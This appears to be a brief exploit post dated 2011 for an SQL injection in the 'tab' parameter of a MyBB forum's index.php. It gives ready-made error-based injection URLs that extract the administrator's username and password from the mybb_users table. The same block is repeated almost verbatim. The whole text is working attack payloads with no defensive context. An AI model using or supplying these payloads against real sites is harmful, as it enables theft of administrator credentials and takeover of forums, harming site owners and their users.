2011-08-15, 10:32 PM
Vulnerability :
$~ http://localhost/mybbpath/index.php?tab=[SQLi]
---------------------------------------
# ~ Expl0itation ~ #
---------------------------------------
$~ Get the administrator's username (usually it has uid=1) ~
http://localhost/mybbpath/index.php?tab=1' and(select 1 from(select count(*),concat((select username from mybb_users where uid=1),floor(Rand(0)*2))a from information_schema.tables group by a)b)-- -
$~ Get the administrator's password ~
http://localhost/mybbpath/index.php?tab=1' and(select 1 from(select count(*),concat((select password from mybb_users where uid=1),floor(Rand(0)*2))a from information_schema.tables group by a)b)-- -
$~ http://localhost/mybbpath/index.php?tab=[SQLi]
---------------------------------------
# ~ Expl0itation ~ #
---------------------------------------
$~ Get the administrator's username (usually it has uid=1) ~
http://localhost/mybbpath/index.php?tab=1' and(select 1 from(select count(*),concat((select username from mybb_users where uid=1),floor(Rand(0)*2))a from information_schema.tables group by a)b)-- -
$~ Get the administrator's password ~
http://localhost/mybbpath/index.php?tab=1' and(select 1 from(select count(*),concat((select password from mybb_users where uid=1),floor(Rand(0)*2))a from information_schema.tables group by a)b)-- -